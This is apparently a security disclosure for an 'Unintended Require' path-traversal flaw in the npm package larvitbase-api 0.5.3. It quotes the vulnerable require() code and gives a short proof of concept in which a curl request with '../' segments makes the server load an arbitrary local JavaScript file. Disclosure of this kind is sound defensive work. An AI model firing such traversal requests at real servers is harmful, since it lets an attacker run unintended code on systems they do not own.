I would like to report Unintended Require vulnerability in larvitbase-api
It allows loading arbitary non-production code (js files).
module name: larvitbase-apiversion:0.5.3npm page: https://www.npmjs.com/package/larvitbase-api
REST http API base framework based on larvitbase (https://github.com/larvit/larvitbase)
59 downloads in the last day
250 downloads in the last week
715 downloads in the last month
larvitbase-api
is an HTTP server which dynamically loads (with help of require()
) some parts of the code. As long as the path to required module is partially depend on the url (req.urlBase), anybody can cause code to load that was not intended to run on the server.
source code example:
https://github.com/larvit/larvitbase-api/blob/master/index.js#L183
req.routed = {
controllerFullPath: path.join(altControllerPaths[i], req.urlBase) + '.js',
controllerPath: req.urlBase
};
https://github.com/larvit/larvitbase-api/blob/master/index.js#L210
require(req.routed.controllerFullPath)(req, res, cb);
Detailed description of this bug can be found here: https://nodesecroadmap.fyi/chapter-1/threat-UIR.html
mkdir poc
cd poc/
npm i larvitbase-api
index.js (example code form https://www.npmjs.com/package/larvitbase-api)
const Api = require('larvitbase-api');
let api;
api = new Api({
'baseOptions': {'httpOptions': 8001},
'routerOptions': {},
'reqParserOptions': {},
});
api.start(function (err) {});
hack.js
console.log('pwned');
node index.js
curl --path-as-is 'http://localhost:8001/../../../../../../hack'
pwned
require(req.routed.controllerFullPath)(req, res, cb);
TypeError: require(...) is not a function
An attacker is able to control the x in require(x) and cause code to load that was not intended to run on the server.